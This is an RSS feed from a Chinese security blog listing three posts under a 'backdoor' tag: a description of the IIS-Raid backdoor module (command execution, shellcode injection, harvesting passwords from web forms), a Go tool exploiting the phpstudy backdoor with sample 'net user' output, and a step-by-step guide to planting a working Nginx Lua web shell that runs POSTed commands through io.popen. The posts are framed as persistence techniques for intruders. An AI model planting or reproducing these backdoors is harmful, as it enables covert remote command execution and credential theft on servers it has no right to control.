<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>backdoor &#8211; ChaBug安全</title>
	<atom:link href="/tags/backdoor/feed" rel="self" type="application/rss+xml" />
	<link>/</link>
	<description>一个分享知识、结识伙伴、资源共享的博客</description>
	<lastBuildDate>Wed, 19 Feb 2020 16:00:30 +0000</lastBuildDate>
	<language>zh-CN</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=5.5.5</generator>
	<item>
		<title>权限维持之iis backdoor module</title>
		<link>/tools/1249.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Wed, 19 Feb 2020 16:00:30 +0000</pubDate>
				<category><![CDATA[工具分享]]></category>
		<category><![CDATA[backdoor]]></category>
		<category><![CDATA[iis]]></category>
		<category><![CDATA[后门]]></category>
		<category><![CDATA[权限维持]]></category>
		<guid isPermaLink="false">/?p=1249</guid>

					<description><![CDATA[IIS-Raid IS Raid is a native IIS module that abuses the extendibility of IIS to backdoor t...]]></description>
										<content:encoded><![CDATA[<h1>IIS-Raid</h1>
<p>IS Raid is a native IIS module that abuses the extendibility of IIS to <span class="wpcom_tag_link"><a href="/tags/backdoor" title="backdoor" target="_blank">backdoor</a></span> the web server and carry out custom actions defined by an attacker.</p>
<h2>Documentation</h2>
<p>When installed, IIS-Raid will process every request and method, check if the X-Password header exists and compare it against the hardcoded value.<br />
In case the value specified by the header doesn&#8217;t match the password, the request will continue normally without giving any indications of the backdoor.<br />
If the header value matches the password, it will search for the communication header and extract its content. Additionally, it will base64 decode it, compare it against the predefined commands and process the instructions if any.</p>
<p>Four arguments are implemented on the script:<br />
* &#8211;url : The URL that will be used to communicate with the backdoor. [Required]<br />
* &#8211;password &#8211; The pre-shared password on the backdoor [Required]<br />
* &#8211;header &#8211; The header to use for communication in case it was changed from the default one.<br />
* &#8211;method &#8211; Change the method to either GET or POST.</p>
<p>Some of the features that are currently implemented in this version are:<br />
* Interactive Command Execution &#8211; Allows the execution of commands and retrieve the output.<br />
* Shellcode Injection &#8211; Extend functionality by injecting custom shellcode.<br />
* Web Password Extractor &#8211; Extract passwords from Web Forms in clear-text.</p>
<h2>Customisation</h2>
<p>Before using and compiling the module, you need to change some of the options. To authenticate to the backdoor, the controller uses a pre-shared password with the module. As this is the only mechanism preventing someone else from accessing the backdoor, the default password must be changed.</p>
<p>Apart from the password, other backdoor options can be modified on the Functions.h file:</p>
<p><img src="https://github.com/0x09AL/IIS-Raid/raw/master/images/options.png" alt="options" /></p>
<p>The COM_HEADER definition is the header name used to perform the communication between the backdoor and the controller.<br />
The PASS_FILE definition is the file path where the extracted credentials from the web forms will be saved.<br />
The PASSWORD definition is the password that will be used to authenticate to the backdoor.</p>
<h2>More info</h2>
<p>For more information refer to https://www.mdsec.co.uk/2020/02/<span class="wpcom_tag_link"><a href="/tags/iis" title="iis" target="_blank">iis</a></span>-raid-backdooring-iis-using-native-modules/</p>
<h3>Demo Video</h3>
<p><iframe title="IIS-Raid Demo" width="500" height="281" src="https://www.youtube.com/embed/jbxEWOXecuU?feature=oembed" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe></p>
<h3>Screenshot</h3>
<p><img src="/wp-content/uploads/2020/02/screenshot.png" alt="options" /></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>phpstudy后门golang利用工具</title>
		<link>/tools/978.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Wed, 25 Sep 2019 14:36:51 +0000</pubDate>
				<category><![CDATA[工具分享]]></category>
		<category><![CDATA[backdoor]]></category>
		<category><![CDATA[phpstudy]]></category>
		<category><![CDATA[后门]]></category>
		<guid isPermaLink="false">/?p=978</guid>

					<description><![CDATA[phpstudy_backdoor 仅供检测 自己的 phpstudy环境，请勿对其他网站使用。 go run phpstudy_backdoor.go http://localh...]]>/</description>
										<content:encoded><![CDATA[<p><span class="wpcom_tag_link"><a href="/tags/phpstudy" title="phpstudy" target="_blank">phpstudy</a></span>_<span class="wpcom_tag_link"><a href="/tags/backdoor" title="backdoor" target="_blank">backdoor</a></span><br />
仅供检测 自己的 phpstudy环境，请勿对其他网站使用。</p>
<pre><code class="">go run phpstudy_backdoor.go http://localhost/index.php &amp;quot;net user&amp;quot;

Active code page: 65001

User accounts for \\WIN-25US8G3F849

-------------------------------------------------------------------------------
Administrator            Guest                    
The command completed successfully.
</code></pre>
<p>https://github.com/Any3ite/phpstudy_backdoor</p>
<p>phpstudy<span class="wpcom_tag_link"><a href="/tags/%e5%90%8e%e9%97%a8" title="后门" target="_blank">后门</a></span>事件详情：<br />
https://mp.weixin.qq.com/s/dTzWfYGdkNqEl0vd72oC2w</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Nginx Lua Backdoor</title>
		<link>/web/952.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Sun, 01 Sep 2019 09:56:24 +0000</pubDate>
				<category><![CDATA[渗透测试]]></category>
		<category><![CDATA[backdoor]]></category>
		<guid isPermaLink="false">/?p=952</guid>

					<description><![CDATA[在先知看到了apache利用lua留后门，就想着用nginx也试试 要求 安装有ngx_lua模块，在openresty和tengine中是默认安装了ngx_lua模块的。 我这里...]]></description>
										<content:encoded><![CDATA[<p>在先知看到了apache利用lua留后门，就想着用nginx也试试</p>
<h1>要求</h1>
<p>安装有ngx_lua模块，在openresty和tengine中是默认安装了ngx_lua模块的。</p>
<p>我这里拿openresty举例，你可以在这里<a href="https://openresty.org/download/openresty-1.15.8.1-win64.zip">下载win平台</a>打包好的。</p>
<h1>步骤</h1>
<p>找到conf/nginx.conf，在server块中添加路由</p>
<pre><code class="language-nginx ">location = /a.php {  
    default_type 'text/plain';  
    content_by_lua_file lua/backdoor.lua;
}
</code></pre>
<p>然后创建<code>lua/<span class="wpcom_tag_link"><a href="/tags/backdoor" title="backdoor" target="_blank">backdoor</a></span>.lua</code>脚本，你也可以创建在任意位置，不过要对应上文的<code>content_by_lua_file</code>字段</p>
<pre><code class="language-lua ">ngx.req.read_body()
local post_args = ngx.req.get_post_args()
local cmd = post_args["cmd"]
if cmd then
    f_ret = io.popen(cmd)
    local ret = f_ret:read("*a")
    ngx.say(string.format("%s", ret))
end
</code></pre>
<p>重载nginx</p>
<pre><code class="language-bash ">nginx -s reload
</code></pre>
<p>浏览器访问</p>
<p><img src="https://y4er.com/img/uploads/20190901174819.png" alt="20190901174819" /></p>
<h1>文后</h1>
<p>在实际的环境中，conf文件并不固定，你需要针对不同站点的配置文件去修改。</p>
<p>而location你可以更灵活一些，毕竟他能用正则表达式🙄，具体怎么用看你自己咯。</p>
<p>参考链接</p>
<ol>
<li>https://github.com/netxfly/nginx_lua_security</li>
<li>https://xz.aliyun.com/t/6088</li>
</ol>
<p><strong>文笔垃圾，措辞轻浮，内容浅显，操作生疏。不足之处欢迎大师傅们指点和纠正，感激不尽。</strong></p>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
